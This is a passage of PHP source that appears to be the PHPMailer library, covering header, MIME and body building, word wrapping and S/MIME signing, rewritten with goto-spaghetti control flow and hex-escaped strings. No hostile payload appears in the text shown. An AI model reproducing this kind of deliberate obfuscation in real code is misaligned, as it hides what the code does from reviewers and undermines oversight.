goto mibRW; lkxtm: } public function smtpClose() { goto ctFKF; ctFKF: if (!is_a($this->smtp, "\123\115\x54\x50")) { goto HEIHX; } goto pX_IT; pX_IT: if (!$this->smtp->connected()) { goto ehF8B; } goto VLRfi; VLRfi: $this->smtp->quit(); goto mMnns; F8u4_: ehF8B: goto f1RSR; mMnns: $this->smtp->close(); goto F8u4_; f1RSR: HEIHX: goto n5ZzO; n5ZzO: } public function setLanguage($langcode = "\145\x6e", $lang_path = '') { goto ADvhz; cAh5w: if (!($langcode != "\x65\x6e")) { goto zyeL4; } goto WZlHW; bMpUB: if (!empty($lang_path)) { goto ve4PI; } goto eLP2m; H5KTV: WQseD: goto pOs2P; W9AXa: if (!isset($renamed_langcodes[$langcode])) { goto WQseD; } goto DBvCB; hhkB5: TgDEM: goto OwMjD; askVI: $foundlang = (include $lang_file); goto UNsXc; ADvhz: $renamed_langcodes = array("\142\x72" => "\x70\x74\137\x62\162", "\x63\x7a" => "\143\x73", "\x64\153" => "\144\x61", "\x6e\157" => "\x6e\x62", "\x73\x65" => "\163\x76", "\163\x72" => "\162\163"); goto W9AXa; Aux1f: bbTnz: goto FTyRb; TEsU4: $this->language = $PHPMAILER_LANG; goto q5JA8; DBvCB: $langcode = $renamed_langcodes[$langcode]; goto H5KTV; UNsXc: goto TgDEM; goto vqiBc; q5JA8: return (bool) $foundlang; goto tgmVn; z_VaE: ve4PI: goto Dhj3Y; tJfuR: $foundlang = false; goto hhkB5; QLI5B: $lang_file = $lang_path . "\x70\150\x70\155\x61\151\x6c\145\162\x2e\154\x61\156\147\55" . $langcode . "\56\160\150\x70"; goto cAh5w; Dhj3Y: if (preg_match("\x2f\x5e\133\141\55\172\x5d\173\62\x7d\x28\77\x3a\x5f\x5b\141\55\x7a\101\55\x5a\135\173\x32\175\51\77\x24\x2f", $langcode)) { goto bbTnz; } goto FSjKc; WZlHW: if (!self::isPermittedPath($lang_file) or !is_readable($lang_file)) { goto dzety; } goto askVI; vqiBc: dzety: goto tJfuR; eLP2m: $lang_path = dirname(__FILE__) . DIRECTORY_SEPARATOR . "\x6c\x61\x6e\x67\165\141\x67\x65" . DIRECTORY_SEPARATOR; goto z_VaE; FSjKc: $langcode = "\145\156"; goto Aux1f; pOs2P: $PHPMAILER_LANG = array("\141\x75\164\x68\145\156\164\151\x63\141\x74\x65" => "\x53\x4d\124\120\40\x45\162\162\157\162\72\40\x43\x6f\165\154\144\40\156\157\164\x20\x61\165\164\x68\145\156\164\151\143\141\x74\x65\56", "\143\x6f\x6e\x6e\145\143\x74\137\150\157\x73\x74" => "\123\x4d\x54\120\x20\105\x72\x72\157\x72\72\x20\x43\x6f\x75\154\144\x20\x6e\157\x74\x20\x63\x6f\x6e\156\145\x63\x74\x20\x74\x6f\x20\x53\115\124\120\40\150\157\163\x74\x2e", "\144\x61\x74\x61\137\x6e\x6f\x74\137\x61\x63\x63\x65\x70\x74\x65\144" => "\123\x4d\x54\x50\40\x45\x72\x72\x6f\x72\72\40\x64\x61\164\141\x20\156\157\164\40\x61\143\143\145\160\x74\x65\x64\56", "\x65\x6d\x70\164\x79\137\155\x65\x73\163\x61\147\145" => "\x4d\145\x73\163\141\x67\145\40\x62\x6f\x64\x79\x20\145\155\160\x74\171", "\x65\x6e\x63\x6f\144\x69\x6e\147" => "\125\x6e\x6b\156\x6f\x77\156\40\x65\x6e\143\157\x64\x69\156\147\72\x20", "\145\170\145\x63\x75\164\145" => "\x43\157\x75\154\144\40\x6e\157\x74\x20\145\170\x65\x63\x75\164\x65\x3a\40", "\146\151\x6c\x65\137\x61\x63\143\x65\x73\x73" => "\x43\x6f\165\154\x64\40\x6e\157\164\40\x61\x63\143\145\x73\x73\40\x66\151\x6c\145\72\x20", "\x66\x69\x6c\x65\137\x6f\160\145\x6e" => "\x46\151\154\145\40\105\x72\162\157\162\x3a\40\x43\x6f\165\x6c\144\x20\156\x6f\x74\x20\157\x70\145\156\x20\x66\x69\x6c\145\72\40", "\146\x72\157\155\x5f\x66\x61\x69\154\x65\x64" => "\124\x68\x65\x20\x66\157\154\154\157\167\x69\x6e\x67\x20\106\162\157\155\x20\x61\144\x64\162\x65\x73\163\x20\146\141\151\154\x65\144\x3a\x20", "\151\x6e\163\x74\x61\156\x74\x69\141\164\x65" => "\x43\x6f\165\154\144\40\156\157\x74\40\x69\156\x73\164\141\x6e\164\x69\x61\x74\145\40\155\x61\x69\154\x20\146\x75\x6e\143\164\151\157\x6e\56", "\x69\156\x76\141\x6c\x69\144\137\141\144\x64\x72\145\x73\163" => "\x49\156\x76\x61\x6c\151\144\x20\x61\x64\x64\162\x65\163\163\x3a\x20", "\x6d\141\151\154\x65\162\x5f\x6e\157\164\137\163\x75\x70\160\x6f\x72\x74\x65\x64" => "\x20\155\141\x69\154\x65\x72\40\151\x73\40\156\157\164\x20\163\x75\x70\x70\x6f\162\x74\x65\x64\x2e", "\x70\162\157\166\151\x64\145\x5f\141\144\x64\x72\145\163\x73" => "\131\157\165\x20\x6d\165\163\x74\40\x70\x72\157\166\x69\144\x65\40\141\x74\x20\154\x65\x61\x73\x74\40\x6f\x6e\x65\40\162\x65\143\x69\x70\x69\145\x6e\164\x20\x65\155\141\x69\x6c\x20\x61\x64\x64\x72\145\x73\x73\x2e", "\x72\x65\143\151\160\x69\x65\x6e\x74\x73\x5f\146\x61\151\x6c\145\144" => "\123\115\x54\120\40\x45\162\162\x6f\162\72\40\x54\150\x65\40\x66\x6f\x6c\x6c\157\167\151\x6e\147\40\162\145\x63\151\x70\x69\145\x6e\164\x73\40\146\141\x69\154\145\144\x3a\x20", "\163\151\x67\x6e\x69\156\147" => "\123\x69\147\156\x69\156\x67\40\x45\162\x72\157\x72\x3a\40", "\163\155\164\x70\x5f\143\x6f\156\156\x65\143\164\137\146\141\x69\154\145\x64" => "\123\x4d\x54\x50\x20\143\157\156\156\145\x63\164\50\51\40\x66\x61\x69\x6c\x65\x64\x2e", "\x73\155\x74\160\137\x65\162\x72\x6f\x72" => "\x53\x4d\124\x50\40\163\x65\162\x76\x65\x72\x20\145\162\x72\157\x72\72\x20", "\166\x61\x72\x69\141\x62\x6c\145\137\x73\x65\x74" => "\x43\141\156\x6e\x6f\164\x20\x73\145\164\40\x6f\x72\40\x72\x65\x73\145\x74\x20\x76\x61\x72\x69\141\142\x6c\145\x3a\x20", "\145\x78\x74\145\156\163\x69\x6f\x6e\x5f\155\151\x73\x73\x69\x6e\x67" => "\105\x78\164\x65\156\x73\151\x6f\156\40\x6d\151\x73\163\x69\x6e\x67\x3a\40"); goto bMpUB; FTyRb: $foundlang = true; goto QLI5B; OwMjD: zyeL4: goto TEsU4; tgmVn: } public function getTranslations() { return $this->language; } public function addrAppend($type, $addr) { goto xYI_l; zKQd4: return $type . "\72\40" . implode("\x2c\x20", $addresses) . $this->LE; goto zx4fl; fLPHd: wWop5: goto zKQd4; A2dMB: foreach ($addr as $address) { $addresses[] = $this->addrFormat($address); bj4oC: } goto fLPHd; xYI_l: $addresses = array(); goto A2dMB; zx4fl: } public function addrFormat($addr) { goto hvA63; hvA63: if (empty($addr[1])) { goto G0SlG; } goto PEIy7; fpbaz: goto wxneq; goto ovyuF; ovyuF: G0SlG: goto aLb_i; aLb_i: return $this->secureHeader($addr[0]); goto wKqAi; PEIy7: return $this->encodeHeader($this->secureHeader($addr[1]), "\x70\x68\x72\141\x73\x65") . "\40\74" . $this->secureHeader($addr[0]) . "\76"; goto fpbaz; wKqAi: wxneq: goto G4H6O; G4H6O: } public function wrapText($message, $length, $qp_mode = false) { goto fMYaQ; fMYaQ: if ($qp_mode) { goto RgeBc; } goto Qwqoi; q8G4O: $soft_break = sprintf("\40\x3d\x25\x73", $this->LE); goto nVhMF; tJRop: $crlflen = strlen(self::CRLF); goto PYMO2; Ei5cF: if (!(substr($message, -$lelen) == $this->LE)) { goto CQ4PK; } goto fnd2J; LSCKb: foreach ($lines as $line) { goto isIaU; F2uo9: $firstword = true; goto AIJUG; UfeZZ: $message .= $buf . self::CRLF; goto yRMRe; isIaU: $words = explode("\x20", $line); goto KaKFc; JkDrl: DSr9L: goto UfeZZ; yRMRe: P3KEo: goto BZ2eu; KaKFc: $buf = ''; goto F2uo9; AIJUG: foreach ($words as $word) { goto lfCku; lfCku: if ($qp_mode and strlen($word) > $length) { goto SbVk8; } goto gCEfj; JeWDn: pdUbu: goto nMnR9; jNGTk: XcQ0w: goto gEsHd; Dbyyy: $len--; goto AECJy; nMnR9: if (!(strlen($word) > 0)) { goto HYBLk; } goto oiQNR; whpFg: HC7zm: goto jOI8q; b41rw: $len -= 2; goto Bl7fa; I6xSK: rOKrY: goto sJmO5; K7a2z: goto rMKy4; goto SWu96; ln4fA: goto HYBLk; goto TUFtk; oiQNR: if (!($length <= 0)) { goto yDwQh; } goto ln4fA; ERoOR: WVKXp: goto imS5N; ob0Mh: $message .= $buf_o . $soft_break; goto uA11F; XPWgn: $len = $this->utf8CharBoundary($word, $len); goto zudYL; vggz4: if ($space_left > 20) { goto WVKXp; } goto kgqa6; C_WjY: if ($firstword) { goto axRQb; } goto vggz4; dKkUB: Vls63: goto b41rw; Uwgrm: goto HNUkc; goto n60Ln; zudYL: goto rMKy4; goto c735x; GW3d1: if (substr($word, $len - 2, 1) == "\75") { goto Vls63; } goto K7a2z; imS5N: $len = $space_left; goto L2jUn; YRKQh: Io6B9: goto G692L; UL0N3: nW73_: goto hfJ0g; aty3G: $len -= 2; goto t0xKT; jOI8q: $firstword = false; goto I6xSK; c735x: izQZL: goto Dbyyy; pQIRH: $part = substr($word, 0, $len); goto y1EgH; SR4xD: goto Io6B9; goto izcog; gCEfj: $buf_o = $buf; goto axeo0; YL2o4: $buf = $part; goto SR4xD; Xa5t1: $len = $this->utf8CharBoundary($word, $len); goto SH9XM; hfJ0g: goto HC7zm; goto W0oqF; L2jUn: if ($is_utf8) { goto d1Uj7; } goto JzrgC; NomQ1: $buf .= $word; goto XyDQg; G692L: goto pdUbu; goto y1u5B; gEsHd: $len--; goto MMFpp; axeo0: if ($firstword) { goto LZtyD; } goto XCAtM; UtQUD: if (substr($word, $len - 1, 1) == "\x3d") { goto XcQ0w; } goto jbNBF; geftZ: if (strlen($word) > 0) { goto Siqgd; } goto YL2o4; n60Ln: NhKFX: goto Xa5t1; czsHH: $space_left = $length - strlen($buf) - $crlflen; goto C_WjY; GK5jH: $message .= $part . sprintf("\75\x25\163", self::CRLF); goto YRKQh; ebuQR: goto bErBE; goto ERoOR; X3sNe: axRQb: goto JeWDn; kgqa6: $message .= $buf . $soft_break; goto ebuQR; Bl7fa: rMKy4: goto uER3p; OkrQQ: bErBE: goto ABtVV; B8z3T: $len = $length; goto kzGTt; W0oqF: SbVk8: goto czsHH; skt0z: $buf .= "\40" . $part; goto dT1rF; TUFtk: yDwQh: goto B8z3T; XyDQg: if (!(strlen($buf) > $length and $buf_o != '')) { goto nW73_; } goto ob0Mh; uER3p: $part = substr($word, 0, $len); goto Ur6Wb; y1u5B: HYBLk: goto whpFg; izcog: Siqgd: goto GK5jH; ABtVV: $buf = ''; goto X3sNe; t0xKT: HNUkc: goto pQIRH; MMFpp: goto HNUkc; goto pou0F; y1EgH: $word = substr($word, $len); goto geftZ; jbNBF: if (substr($word, $len - 2, 1) == "\x3d") { goto WR1Cd; } goto Uwgrm; pou0F: WR1Cd: goto aty3G; SH9XM: goto HNUkc; goto jNGTk; AECJy: goto rMKy4; goto dKkUB; SWu96: d1Uj7: goto XPWgn; ogU8X: LZtyD: goto NomQ1; uA11F: $buf = $word; goto UL0N3; kzGTt: if ($is_utf8) { goto NhKFX; } goto UtQUD; JzrgC: if (substr($word, $len - 1, 1) == "\x3d") { goto izQZL; } goto GW3d1; XCAtM: $buf .= "\40"; goto ogU8X; Ur6Wb: $word = substr($word, $len); goto skt0z; dT1rF: $message .= $buf . sprintf("\75\45\x73", self::CRLF); goto OkrQQ; sJmO5: } goto JkDrl; BZ2eu: } goto c1e9g; G8RnP: CQ4PK: goto rDyvE; c2HKa: $is_utf8 = strtolower($this->CharSet) == "\165\x74\x66\55\70"; goto itsDH; PYMO2: $message = $this->fixEOL($message); goto Ei5cF; OwLd7: return $message; goto z4leb; nVhMF: cX2Hs: goto c2HKa; ai1gz: $message = ''; goto LSCKb; bQ7N9: goto cX2Hs; goto f0F_D; f0F_D: RgeBc: goto q8G4O; c1e9g: Byu7r: goto OwLd7; fnd2J: $message = substr($message, 0, -$lelen); goto G8RnP; rDyvE: $lines = explode($this->LE, $message); goto ai1gz; itsDH: $lelen = strlen($this->LE); goto tJRop; Qwqoi: $soft_break = $this->LE; goto bQ7N9; z4leb: } public function utf8CharBoundary($encodedText, $maxLength) { goto yENJB; YU0NN: $maxLength = $maxLength - ($lookBack - $encodedCharPos); goto mPYZR; gaovr: MkKzK: goto jjhvM; KBAXe: $lookBack = 3; goto xTZZv; SDbx8: if ($dec < 128) { goto ZGUlM; } goto c9KHI; kDWCl: Ie2YC: goto rI4PA; XJY6n: if (!($encodedCharPos > 0)) { goto zAOJw; } goto YU0NN; C8F5w: LkRhH: goto hE6np; tjNet: goto kzvGW; goto C8F5w; xTZZv: kzvGW: goto hzmNM; hzmNM: if ($foundSplitPos) { goto LkRhH; } goto QVsE7; jjhvM: $maxLength = $maxLength - ($lookBack - $encodedCharPos); goto dpvgp; l6lVV: goto JN4XV; goto NcDe_; mPYZR: zAOJw: goto IXDnV; NJo2E: OgTWs: goto tjNet; NcDe_: ZGUlM: goto XJY6n; dpvgp: $foundSplitPos = true; goto Y66AV; IXDnV: $foundSplitPos = true; goto tv6hf; JcQHC: $dec = hexdec($hex); goto SDbx8; Te6cX: goto OgTWs; goto j6xKX; Y66AV: goto JN4XV; goto kDWCl; u6kIO: $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2); goto JcQHC; o0CKc: JN4XV: goto NJo2E; hE6np: return $maxLength; goto nGvfL; yENJB: $foundSplitPos = false; goto KBAXe; a5eax: if (false !== $encodedCharPos) { goto mhWI6; } goto fjp6V; QVsE7: $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack); goto Oc19c; Oc19c: $encodedCharPos = strpos($lastChunk, "\x3d"); goto a5eax; c9KHI: if ($dec >= 192) { goto MkKzK; } goto DhkPI; tv6hf: goto JN4XV; goto gaovr; DhkPI: if ($dec < 192) { goto Ie2YC; } goto l6lVV; fjp6V: $foundSplitPos = true; goto Te6cX; rI4PA: $lookBack += 3; goto o0CKc; j6xKX: mhWI6: goto u6kIO; nGvfL: } public function setWordWrap() { goto jyge7; jyge7: if (!($this->WordWrap < 1)) { goto Kv9sg; } goto oKW_q; oKW_q: return; goto l4vBl; Dlinn: ILvAt: goto cQIQR; dcMpa: switch ($this->message_type) { case "\141\x6c\x74": case "\141\154\164\137\x69\156\154\151\156\x65": case "\141\154\164\137\141\164\x74\141\143\x68": case "\x61\x6c\164\137\x69\x6e\x6c\151\156\x65\x5f\141\x74\x74\x61\143\150": $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap); goto vK7kT; default: $this->Body = $this->wrapText($this->Body, $this->WordWrap); goto vK7kT; } goto Dlinn; cQIQR: vK7kT: goto OAdCS; l4vBl: Kv9sg: goto dcMpa; OAdCS: } public function createHeader() { goto CvOAg; J_luu: goto ny83j; goto PNh0P; Do0eK: $result .= $this->headerLine("\115\x65\x73\163\x61\x67\145\x2d\x49\104", $this->lastMessageID); goto X8m7C; sinTT: E3oMB: goto Y1tMb; mZHQ2: if (!($this->Mailer != "\155\141\151\154")) { goto E3oMB; } goto ujE1J; tll7O: kn20h: goto Fg_dD; ryF2Q: $result .= $this->headerLine("\x58\x2d\115\x61\x69\x6c\145\162", $myXmailer); goto BfJ2O; Cl0Rp: lr3vG: goto FsGAv; JQmCx: ips3j: goto aY6vG; AUCrv: goto YIaKT; goto B_qv3; rkwx9: $result .= $this->addrAppend("\122\145\x70\x6c\x79\x2d\124\157", $this->ReplyTo); goto dzBO0; hlLQD: goto jOopP; goto tll7O; UUWde: foreach ($this->to as $toaddr) { $this->SingleToArray[] = $this->addrFormat($toaddr); VPTS0: } goto Lx4Od; B_qv3: vhfkV: goto A032f; FgTnj: if ($this->XMailer == '') { goto ips3j; } goto TFjdp; m8QxC: $result .= $this->addrAppend("\106\162\x6f\x6d", array(array(trim($this->From), $this->FromName))); goto Znyvv; Znyvv: if (!(count($this->cc) > 0)) { goto fjuGc; } goto YZsOl; LaX4A: $result .= $this->getMailMIME(); goto r5E0m; qzyLI: if (!$myXmailer) { goto FUrqk; } goto ryF2Q; Qg786: $result .= $this->addrAppend("\x42\x63\143", $this->bcc); goto rYKKi; kOunS: if (!(($this->Mailer == "\x73\145\156\144\155\x61\x69\154" or $this->Mailer == "\x71\155\141\x69\154" or $this->Mailer == "\x6d\141\151\154") and count($this->bcc) > 0)) { goto bPZXy; } goto Qg786; CvOAg: $result = ''; goto B8AJN; rYKKi: bPZXy: goto by540; USjgV: return $result; goto YwQbk; JGYcp: $result .= $this->headerLine("\x54\157", "\165\x6e\x64\151\163\x63\x6c\x6f\163\x65\x64\x2d\162\145\143\151\x70\151\x65\156\x74\163\72\73"); goto qUv2w; dzBO0: NmdCj: goto FBXfQ; qdw3s: if ('' != $this->MessageID and preg_match("\57\x5e\74\x2e\52\x40\x2e\x2a\76\x24\57", $this->MessageID)) { goto vhfkV; } goto ensaw; Fg_dD: if (!($this->Mailer != "\155\141\x69\x6c")) { goto uSKpk; } goto UUWde; LTOZn: YIaKT: goto Do0eK; FBXfQ: if (!($this->Mailer != "\x6d\x61\151\154")) { goto giKP_; } goto sWIpK; Yk1AQ: goto ALprR; goto JQmCx; T3JG1: jOopP: goto m8QxC; A032f: $this->lastMessageID = $this->MessageID; goto LTOZn; W4Fot: fjuGc: goto kOunS; Lx4Od: FsLzp: goto ghtE0; HFbC7: if ($this->sign_key_file) { goto I4xty; } goto wQqlf; pUKEJ: bv3Y8: goto JGYcp; by540: if (!(count($this->ReplyTo) > 0)) { goto NmdCj; } goto rkwx9; B8AJN: $result .= $this->headerLine("\x44\141\164\145", $this->MessageDate == '' ? self::rfcDate() : $this->MessageDate); goto jt14y; r5E0m: I4xty: goto USjgV; AOYxF: ZN8fi: goto HFbC7; wQqlf: $result .= $this->headerLine("\115\x49\x4d\x45\x2d\x56\145\x72\x73\151\157\x6e", "\61\x2e\x30"); goto LaX4A; Lxn8r: giKP_: goto qdw3s; ghtE0: uSKpk: goto T3JG1; ujE1J: $result .= $this->addrAppend("\x54\157", $this->to); goto sinTT; Y1tMb: goto ny83j; goto pUKEJ; h0FBi: if (count($this->to) > 0) { goto uOqjO; } goto pz6oo; ensaw: $this->lastMessageID = sprintf("\74\x25\163\100\45\163\76", $this->uniqueid, $this->serverHostname()); goto AUCrv; TFjdp: $myXmailer = trim($this->XMailer); goto qzyLI; X8m7C: if (is_null($this->Priority)) { goto gjmqP; } goto gC1yt; aY6vG: $result .= $this->headerLine("\130\55\115\x61\x69\154\145\162", "\120\x48\x50\115\141\151\154\x65\x72\40" . $this->Version . "\x20\x28\x68\164\164\160\x73\x3a\x2f\x2f\x67\x69\164\x68\165\142\x2e\x63\x6f\155\x2f\120\x48\120\115\141\x69\154\x65\x72\57\x50\110\120\115\141\151\x6c\145\162\x29"); goto g0btj; gC1yt: $result .= $this->headerLine("\130\x2d\120\162\151\157\x72\151\x74\x79", $this->Priority); goto QI1Oy; QI1Oy: gjmqP: goto FgTnj; BfJ2O: FUrqk: goto Yk1AQ; cz2gx: if (!($this->ConfirmReadingTo != '')) { goto lr3vG; } goto M5NO8; pz6oo: if (count($this->cc) == 0) { goto bv3Y8; } goto J_luu; jt14y: if ($this->SingleTo) { goto kn20h; } goto h0FBi; FsGAv: foreach ($this->CustomHeader as $header) { $result .= $this->headerLine(trim($header[0]), $this->encodeHeader(trim($header[1]))); lrcRs: } goto AOYxF; YZsOl: $result .= $this->addrAppend("\x43\143", $this->cc); goto W4Fot; PNh0P: uOqjO: goto mZHQ2; qUv2w: ny83j: goto hlLQD; M5NO8: $result .= $this->headerLine("\104\151\x73\160\x6f\163\151\164\x69\157\156\x2d\x4e\x6f\x74\x69\146\151\x63\141\x74\x69\157\156\55\124\157", "\74" . $this->ConfirmReadingTo . "\x3e"); goto Cl0Rp; g0btj: ALprR: goto cz2gx; sWIpK: $result .= $this->headerLine("\123\x75\142\152\x65\143\x74", $this->encodeHeader($this->secureHeader($this->Subject))); goto Lxn8r; YwQbk: } public function getMailMIME() { goto vPFj_; HATPv: switch ($this->message_type) { case "\x69\x6e\154\151\x6e\145": goto cteMg; aveB1: $result .= $this->textLine("\x9\x62\x6f\x75\156\x64\141\x72\x79\75\x22" . $this->boundary[1] . "\x22"); goto YR3Ug; cteMg: $result .= $this->headerLine("\103\x6f\156\164\145\156\x74\x2d\124\171\x70\x65", "\x6d\x75\x6c\164\x69\x70\x61\x72\x74\x2f\x72\145\154\141\164\x65\144\73"); goto aveB1; YR3Ug: goto LjKxy; goto AYQt9; AYQt9: case "\x61\164\164\x61\x63\x68": case "\151\156\154\x69\156\x65\x5f\141\164\x74\x61\x63\150": case "\141\x6c\x74\x5f\141\x74\164\141\x63\x68": case "\141\x6c\164\x5f\x69\156\154\x69\x6e\145\x5f\x61\164\164\141\143\150": goto vTdCD; phrpU: $result .= $this->textLine("\11\142\157\x75\156\x64\x61\162\x79\x3d\x22" . $this->boundary[1] . "\x22"); goto cRpBJ; cRpBJ: goto LjKxy; goto f28st; vTdCD: $result .= $this->headerLine("\103\157\x6e\x74\x65\x6e\x74\x2d\x54\171\x70\145", "\x6d\x75\154\164\151\x70\141\162\x74\57\155\151\170\145\144\x3b"); goto phrpU; f28st: case "\x61\154\164": case "\141\154\164\x5f\x69\156\x6c\x69\x6e\x65": goto FXIwQ; FXIwQ: $result .= $this->headerLine("\103\157\x6e\164\145\x6e\164\x2d\124\171\160\145", "\155\165\154\164\x69\x70\x61\162\164\x2f\141\x6c\x74\x65\162\156\x61\164\x69\166\x65\x3b"); goto mHpQR; mHpQR: $result .= $this->textLine("\x9\142\157\165\x6e\x64\141\162\x79\x3d\42" . $this->boundary[1] . "\x22"); goto hz0bM; hz0bM: goto LjKxy; goto SPLrJ; SPLrJ: default: goto Tv7JA; A6jVH: goto LjKxy; goto ht631; Tv7JA: $result .= $this->textLine("\x43\x6f\156\x74\145\x6e\164\55\124\171\x70\x65\72\40" . $this->ContentType . "\x3b\x20\143\x68\x61\162\163\x65\164\75" . $this->CharSet); goto F0TVG; F0TVG: $ismultipart = false; goto A6jVH; ht631: } goto zpVVi; NgaFG: goto cBVj9; goto SJFtm; C0_Bj: return $result; goto jPQZr; vPFj_: $result = ''; goto ix7e5; SM8tk: if (!($this->Encoding != "\x37\142\151\164")) { goto WUeVj; } goto em16a; u5Bee: $result .= $this->headerLine("\103\157\x6e\164\145\x6e\x74\55\124\162\x61\156\163\146\145\x72\55\105\x6e\143\x6f\x64\x69\x6e\147", "\70\x62\x69\x74"); goto rFFxf; zpVVi: q6Ubl: goto IbIh8; rFFxf: WQY3C: goto IOKkm; ix7e5: $ismultipart = true; goto HATPv; p82Fi: if (!($this->Mailer != "\155\x61\151\x6c")) { goto cR43s; } goto lMs0e; ARtVA: cR43s: goto C0_Bj; eNRQS: WUeVj: goto p82Fi; em16a: if ($ismultipart) { goto Q_KNE; } goto mjbmf; mjbmf: $result .= $this->headerLine("\103\x6f\156\164\x65\156\164\55\124\x72\141\x6e\163\146\145\x72\x2d\x45\x6e\143\x6f\x64\151\x6e\147", $this->Encoding); goto NgaFG; qsuSE: if (!($this->Encoding == "\70\x62\151\x74")) { goto WQY3C; } goto u5Bee; IbIh8: LjKxy: goto SM8tk; IOKkm: cBVj9: goto eNRQS; lMs0e: $result .= $this->LE; goto ARtVA; SJFtm: Q_KNE: goto qsuSE; jPQZr: } public function getSentMIMEMessage() { return rtrim($this->MIMEHeader . $this->mailHeader, "\12\xd") . self::CRLF . self::CRLF . $this->MIMEBody; } protected function generateId() { return md5(uniqid(time())); } public function createBody() { goto UGY_V; TbUIO: try { goto sr28E; TN5NQ: if ($sign) { goto w7fGh; } goto kMXUc; Cad2y: @unlink($signed); goto w6m4q; nqrAF: if (!(false === file_put_contents($file, $body))) { goto FZXwR; } goto G2Iyy; Ii0_M: @unlink($signed); goto CvgoA; CY1fD: w7fGh: goto STiFT; bRJQH: $body = $parts[1]; goto cb0el; y9aAw: $sign = @openssl_pkcs7_sign($file, $signed, "\x66\x69\x6c\145\x3a\x2f\x2f" . realpath($this->sign_cert_file), array("\146\x69\154\145\x3a\57\57" . realpath($this->sign_key_file), $this->sign_key_pass), null); goto og4MP; og4MP: X3b23: goto TN5NQ; CFZus: throw new phpmailerException($this->lang("\145\x78\164\x65\x6e\163\151\x6f\x6e\x5f\155\151\163\163\x69\156\x67") . "\157\x70\145\x6e\x73\163\154"); goto jG2kB; cb0el: ZGGxS: goto uyzw2; FaWFN: $file = tempnam(sys_get_temp_dir(), "\x6d\141\x69\154"); goto nqrAF; w6m4q: throw new phpmailerException($this->lang("\163\x69\x67\x6e\151\x6e\x67") . openssl_error_string()); goto Q9AOp; rvRGa: $this->MIMEHeader .= $parts[0] . $this->LE . $this->LE; goto bRJQH; Q9AOp: goto ZGGxS; goto CY1fD; G2Iyy: throw new phpmailerException($this->lang("\x73\x69\147\x6e\x69\156\x67") . "\40\x43\157\165\x6c\144\x20\156\x6f\164\40\x77\x72\x69\164\x65\x20\164\145\x6d\x70\x20\x66\151\154\x65"); goto c2e70; vQ7UF: mERL2: goto y9aAw; STiFT: @unlink($file); goto BbcA8; kMXUc: @unlink($file); goto Cad2y; d8DIA: goto X3b23; goto vQ7UF; FNTnN: if (empty($this->sign_extracerts_file)) { goto mERL2; } goto ImJ5x; CvgoA: $parts = explode("\xa\12", $body, 2); goto rvRGa; ImJ5x: $sign = @openssl_pkcs7_sign($file, $signed, "\146\x69\x6c\x65\72\x2f\x2f" . realpath($this->sign_cert_file), array("\146\x69\154\x65\x3a\57\57" . realpath($this->sign_key_file), $this->sign_key_pass), null, PKCS7_DETACHED, $this->sign_extracerts_file); goto d8DIA; c2e70: FZXwR: goto OjpC1; jG2kB: YiZM4: goto FaWFN; OjpC1: $signed = tempnam(sys_get_temp_dir(), "\163\x69\x67\156\x65\x64"); goto FNTnN; sr28E: if (defined("\x50\113\103\x53\x37\137\124\105\x58\124")) { goto YiZM4; } goto CFZus; BbcA8: $body = file_get_contents($signed); goto Ii0_M; uyzw2: } catch (phpmailerException $exc) { goto Ty3vW; BCKAG: if (!$this->exceptions) { goto GOSUA; } goto cwO0C; cwO0C: throw $exc; goto fqfPg; fqfPg: GOSUA: goto wGqbv; Ty3vW: $body = ''; goto BCKAG; wGqbv: } goto CN2gP; z2KFf: $bodyEncoding = $this->Encoding; goto ktK41; CGQqJ: $altBodyEncoding = "\161\165\x6f\x74\x65\x64\x2d\160\x72\151\x6e\x74\141\x62\154\145"; goto MUCXI; IPNIe: if ($this->sign_key_file) { goto Db5FO; } goto YwDyh; ktK41: $bodyCharSet = $this->CharSet; goto X6ePS; UGY_V: $body = ''; goto a7kM3; tfkHz: $bodyEncoding = "\161\165\x6f\x74\x65\x64\55\x70\x72\151\156\x74\x61\x62\154\x65"; goto m1bbg; DHIMj: if (!$this->sign_key_file) { goto VuDuD; } goto BOc3d; PTNRB: if (!($altBodyEncoding == "\70\x62\x69\x74" and !$this->has8bitChars($this->AltBody))) { goto QoBBl; } goto kRxGD; pB30J: return $body; goto McI5k; yeix8: QvhDd: goto drK8i; iPRha: $altBodyCharSet = $this->CharSet; goto PTNRB; PDIx7: $altBodyEncoding = $this->Encoding; goto iPRha; td2MR: HNrWS: goto yeix8; drK8i: if ($this->isError()) { goto hc1eT; } goto IPNIe; X6ePS: if (!($bodyEncoding == "\x38\x62\151\x74" and !$this->has8bitChars($this->Body))) { goto mArpb; } goto qGC8k; m1bbg: imvJW: goto PDIx7; DWVCn: VuDuD: goto dEPDV; MRCrr: $altBodyCharSet = "\165\163\x2d\141\x73\x63\151\151"; goto Im9Y_; qGC8k: $bodyEncoding = "\x37\x62\151\x74"; goto Zp11q; k5nsd: $this->boundary[2] = "\x62\62\137" . $this->uniqueid; goto X7n2r; AJsor: switch ($this->message_type) { case "\x69\156\x6c\x69\156\145": goto tML1V; tML1V: $body .= $mimepre; goto AI3w7; gYzUr: $body .= $this->attachAll("\151\156\154\151\x6e\x65", $this->boundary[1]); goto UT3TZ; VAV8x: $body .= $this->encodeString($this->Body, $bodyEncoding); goto h19be; UT3TZ: goto QvhDd; goto pIoBx; h19be: $body .= $this->LE . $this->LE; goto gYzUr; AI3w7: $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); goto VAV8x; pIoBx: case "\x61\164\x74\x61\143\150": goto MuwLS; VFYED: goto QvhDd; goto n1POD; BL4u5: $body .= $this->encodeString($this->Body, $bodyEncoding); goto XhKVJ; MWUTL: $body .= $this->attachAll("\x61\164\164\x61\x63\150\x6d\x65\156\x74", $this->boundary[1]); goto VFYED; MuwLS: $body .= $mimepre; goto aelIJ; aelIJ: $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); goto BL4u5; XhKVJ: $body .= $this->LE . $this->LE; goto MWUTL; n1POD: case "\151\x6e\154\151\x6e\145\137\141\x74\164\x61\x63\150": goto vZPbF; dwuN5: $body .= $this->LE; goto YUYX_; TkZ3s: $body .= $this->textLine("\x9\142\x6f\x75\x6e\x64\x61\162\171\75\42" . $this->boundary[2] . "\42"); goto dwuN5; p65M6: $body .= $this->attachAll("\x69\x6e\154\151\x6e\145", $this->boundary[2]); goto eQMvR; D4p2a: $body .= $this->textLine("\55\55" . 